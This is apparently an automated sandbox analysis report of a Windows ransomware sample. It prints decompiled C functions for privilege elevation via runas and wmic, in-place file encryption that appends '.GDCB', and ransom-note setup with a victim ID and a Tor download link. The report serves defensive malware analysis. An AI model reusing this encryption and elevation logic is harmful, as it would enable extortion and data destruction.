                                          • Part of subcall function 0FC63B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FC63BC5
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FC6459F
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FC645B5
                                        • lstrcatW.KERNEL32(00000000,0063005C), ref: 0FC645BD
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FC645D3
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC645E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                        • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                        • API String ID: 2684037697-4098772853
                                        • Opcode ID: 94b56a929a5545d71e9539122508f07f0f773bc118ec9585620891417e1607bc
                                        • Instruction ID: 3d152a0044f27fe1d5ccffc92d0aa60d963f0e15426760aeab04ddacc322f590
                                        • Opcode Fuzzy Hash: 94b56a929a5545d71e9539122508f07f0f773bc118ec9585620891417e1607bc
                                        • Instruction Fuzzy Hash: C841F6B054C380DEE3208F119849B5BBFE6BB85B59F10491CE6985A291C7F6854CCFA7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC63BE0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109memorysynchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC63BE0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FC63B20(__edx);
				if(_t54 != 0) {
					_t54 = E0FC63AA0();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}















































                                        0x0fc63bef
                                        0x0fc63bf1
                                        0x0fc63bf8
                                        0x0fc63bfe
                                        0x0fc63c05
                                        0x0fc63c17
                                        0x0fc63c24
                                        0x0fc63c2d
                                        0x0fc63c35
                                        0x0fc63c3d
                                        0x0fc63c45
                                        0x0fc63c4d
                                        0x0fc63c55
                                        0x0fc63c5d
                                        0x0fc63c65
                                        0x0fc63c6d
                                        0x0fc63c75
                                        0x0fc63c7d
                                        0x0fc63c85
                                        0x0fc63c8d
                                        0x0fc63c98
                                        0x0fc63ca8
                                        0x0fc63cb1
                                        0x0fc63cb9
                                        0x0fc63cc1
                                        0x0fc63cc9
                                        0x0fc63cd1
                                        0x0fc63cd9
                                        0x0fc63ce1
                                        0x0fc63ce9
                                        0x0fc63cf4
                                        0x0fc63cff
                                        0x0fc63d0a
                                        0x0fc63d15
                                        0x0fc63d20
                                        0x0fc63d2b
                                        0x0fc63d36
                                        0x0fc63d41
                                        0x0fc63d4c
                                        0x0fc63d57
                                        0x0fc63d71
                                        0x0fc63d73
                                        0x0fc63d79
                                        0x0fc63d80
                                        0x0fc63d8c
                                        0x0fc63d8e
                                        0x0fc63d95
                                        0x0fc63d9d
                                        0x0fc63da5
                                        0x0fc63dad
                                        0x0fc63db7
                                        0x0fc63dc1
                                        0x0fc63dc4
                                        0x0fc63dcb
                                        0x0fc63dd2
                                        0x0fc63de0
                                        0x0fc63de1
                                        0x0fc63de5
                                        0x00000000
                                        0x00000000
                                        0x0fc63de7
                                        0x0fc63deb
                                        0x00000000
                                        0x00000000
                                        0x0fc63df4
                                        0x00000000
                                        0x0fc63df4
                                        0x0fc63e06
                                        0x0fc63e0f
                                        0x0fc63e17
                                        0x0fc63e17
                                        0x0fc63c05
                                        0x0fc63dfa
                                        0x0fc63e00

                                        APIs
                                          • Part of subcall function 0FC63B20: _memset.LIBCMT ref: 0FC63B72
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FC63B96
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FC63B9A
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FC63B9E
                                          • Part of subcall function 0FC63B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FC63BC5
                                          • Part of subcall function 0FC63AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FC63AD0
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FC63C8D
                                        • wsprintfW.USER32 ref: 0FC63D57
                                        • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FC63D6B
                                        • GetForegroundWindow.USER32 ref: 0FC63D80
                                        • ShellExecuteExW.SHELL32(00000000), ref: 0FC63DE1
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC63DF4
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FC63E06
                                        • CloseHandle.KERNEL32(?), ref: 0FC63E0F
                                        • ExitProcess.KERNEL32 ref: 0FC63E17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                        • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                        • API String ID: 561366689-3790645798
                                        • Opcode ID: 1b99fd7762a415691f724eecdb82b82eadafca8b419e0b064390ee4e3f55aabb
                                        • Instruction ID: b63a145f73e98297533a881924306f181388fe58a6dafc960b341500e92d9079
                                        • Opcode Fuzzy Hash: 1b99fd7762a415691f724eecdb82b82eadafca8b419e0b064390ee4e3f55aabb
                                        • Instruction Fuzzy Hash: 09515AB0008341DFE3208F51D489B9ABFF9FF84759F004A1DE6989A251D7FA9158CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC635E0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320memorystringwindowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E0FC635E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FC663D0(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v56 = _t162;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfc704b0]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfc704b0]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfc704b0]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FC682A0( &_v104, 0x10);
				E0FC682A0( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FC66530(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FC66530(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FC683C0( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FC689C0(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FC63500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}


















































                                        0x0fc635eb
                                        0x0fc635ed
                                        0x0fc635f1
                                        0x0fc635ff
                                        0x0fc63608
                                        0x0fc63613
                                        0x0fc6361f
                                        0x0fc63621
                                        0x0fc6363c
                                        0x0fc6363e
                                        0x0fc63647
                                        0x0fc6364a
                                        0x0fc63651
                                        0x0fc63658
                                        0x0fc63663
                                        0x0fc63669
                                        0x0fc63676
                                        0x0fc6367e
                                        0x0fc6367f
                                        0x0fc6368a
                                        0x0fc6368f
                                        0x0fc63693
                                        0x0fc6369b
                                        0x0fc636a0
                                        0x0fc636b0
                                        0x0fc636c6
                                        0x0fc636c8
                                        0x0fc636de
                                        0x0fc636e4
                                        0x0fc636e9
                                        0x0fc636ec
                                        0x0fc636f1
                                        0x0fc636f3
                                        0x0fc636f8
                                        0x0fc63703
                                        0x0fc63706
                                        0x0fc6370a
                                        0x0fc63711
                                        0x0fc6371f
                                        0x0fc63724
                                        0x0fc63729
                                        0x0fc63767
                                        0x0fc6376c
                                        0x0fc63771
                                        0x0fc637a0
                                        0x0fc637a5
                                        0x0fc637c3
                                        0x0fc637c5
                                        0x0fc637cb
                                        0x0fc6380b
                                        0x0fc63819
                                        0x0fc6381f
                                        0x0fc63826
                                        0x0fc63828
                                        0x0fc6382a
                                        0x0fc6382d
                                        0x0fc63835
                                        0x0fc63850
                                        0x0fc63855
                                        0x0fc6385b
                                        0x0fc63867
                                        0x0fc6386a
                                        0x0fc6386d
                                        0x0fc6386f
                                        0x0fc63872
                                        0x0fc63875
                                        0x0fc6387a
                                        0x0fc63880
                                        0x0fc63880
                                        0x0fc63881
                                        0x0fc63885
                                        0x0fc63885
                                        0x0fc6389b
                                        0x0fc638a2
                                        0x0fc638a7
                                        0x0fc638aa
                                        0x0fc638ad
                                        0x0fc638c2
                                        0x0fc638da
                                        0x0fc638df
                                        0x0fc638e2
                                        0x0fc638e2
                                        0x0fc638ef
                                        0x0fc63902
                                        0x0fc6391d
                                        0x0fc6391f
                                        0x0fc63924
                                        0x0fc63924
                                        0x0fc6392f
                                        0x0fc63935
                                        0x0fc6393a
                                        0x0fc63832
                                        0x00000000
                                        0x0fc63832
                                        0x0fc6393a
                                        0x00000000
                                        0x0fc63855
                                        0x0fc63950
                                        0x0fc63956
                                        0x0fc63967
                                        0x0fc6397c
                                        0x0fc6398c
                                        0x0fc6398c
                                        0x0fc63993
                                        0x0fc639a6
                                        0x0fc639a9
                                        0x0fc639b5
                                        0x0fc639c1
                                        0x0fc639c7
                                        0x0fc639cf
                                        0x0fc639cf
                                        0x0fc639d5
                                        0x0fc637cd
                                        0x0fc637db
                                        0x0fc637e7
                                        0x0fc637e9
                                        0x0fc637ec
                                        0x0fc637f4
                                        0x0fc637f4
                                        0x0fc63773
                                        0x0fc63773
                                        0x0fc6377f
                                        0x0fc63782
                                        0x0fc6378a
                                        0x0fc6378a
                                        0x0fc6372b
                                        0x0fc63738
                                        0x0fc63744
                                        0x0fc63747
                                        0x0fc6374f
                                        0x0fc6374f
                                        0x0fc639e2
                                        0x0fc639ee

                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FC635F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FC635FF
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FC6363A
                                        • lstrcpyW.KERNEL32 ref: 0FC63658
                                        • lstrcatW.KERNEL32(00000000,0047002E), ref: 0FC63663
                                          • Part of subcall function 0FC682A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC682C0
                                          • Part of subcall function 0FC682A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FC682E8
                                          • Part of subcall function 0FC682A0: GetModuleHandleA.KERNEL32(?), ref: 0FC6833D
                                          • Part of subcall function 0FC682A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC6834B
                                          • Part of subcall function 0FC682A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6835A
                                          • Part of subcall function 0FC682A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC6837E
                                          • Part of subcall function 0FC682A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6838C
                                          • Part of subcall function 0FC682A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683A0
                                          • Part of subcall function 0FC682A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683AE
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FC636C6
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FC636F1
                                          • Part of subcall function 0FC66530: EnterCriticalSection.KERNEL32(0FC72A48,?,0FC63724,00000000,00000000,00000000,?,00000800), ref: 0FC6653B
                                          • Part of subcall function 0FC66530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FC63724,00000000,00000000,00000000), ref: 0FC6655E
                                          • Part of subcall function 0FC66530: GetLastError.KERNEL32(?,0FC63724,00000000,00000000,00000000), ref: 0FC66568
                                          • Part of subcall function 0FC66530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC63724,00000000,00000000,00000000), ref: 0FC66584
                                        • MessageBoxA.USER32 ref: 0FC63738
                                        • GetLastError.KERNEL32 ref: 0FC63773
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC639E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                        • String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
                                        • API String ID: 1177701972-69869980
                                        • Opcode ID: 980d3ef730e57dc6bb77747edc4dd74ac432392c15eddadb000befb01ac1830c
                                        • Instruction ID: 39da0a4045df564fab5e35b9e4cd8005da54d269e9fa0f3257394fe19d1a3159
                                        • Opcode Fuzzy Hash: 980d3ef730e57dc6bb77747edc4dd74ac432392c15eddadb000befb01ac1830c
                                        • Instruction Fuzzy Hash: 43C16071E44309ABEB118B95DC86FEEBBB8FF08711F204115F741BA2C1DBB86A548B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC640E0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175stringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 49%
                                        			E0FC640E0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfc72a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FC639F0( &_v148);
				E0FC67330( &_v236, __edx);
				_t97 = E0FC67140( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FC66F40( &_v152, _t98);
				_t60 = E0FC68090(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfc704a0]");
				_t77 = 0xfc72000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfc72000) =  *(_t62 + 0xfc72000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfc72a64 = 0xfc72000;
				_t94 = E0FC68090(0xfc72000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfc72a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xfc72a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000);
					_t54 = E0FC67C10( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfc72000;
					_t69 =  *0xfc72000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfc72000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}























































                                        0x0fc640f5
                                        0x0fc643c8
                                        0x0fc643cd
                                        0x0fc643cd
                                        0x0fc640fb
                                        0x0fc640fc
                                        0x0fc640fe
                                        0x0fc640ff
                                        0x0fc64104
                                        0x0fc64106
                                        0x0fc64107
                                        0x0fc64109
                                        0x0fc6410a
                                        0x0fc6410c
                                        0x0fc6410d
                                        0x0fc6410f
                                        0x0fc64110
                                        0x0fc64115
                                        0x0fc64117
                                        0x0fc64118
                                        0x0fc64121
                                        0x0fc6412d
                                        0x0fc6413e
                                        0x0fc64147
                                        0x0fc64151
                                        0x0fc64157
                                        0x0fc64160
                                        0x0fc64171
                                        0x0fc6416d
                                        0x0fc6416d
                                        0x0fc6416d
                                        0x0fc6417b
                                        0x0fc64187
                                        0x0fc64193
                                        0x0fc64199
                                        0x0fc641a1
                                        0x0fc641a6
                                        0x0fc641ab
                                        0x0fc641ae
                                        0x0fc641b3
                                        0x0fc641c0
                                        0x0fc641c0
                                        0x0fc641c0
                                        0x0fc641c3
                                        0x0fc641c8
                                        0x0fc641cc
                                        0x0fc641d1
                                        0x0fc641d1
                                        0x0fc641e0
                                        0x0fc641e0
                                        0x0fc641e7
                                        0x0fc641e8
                                        0x0fc641f4
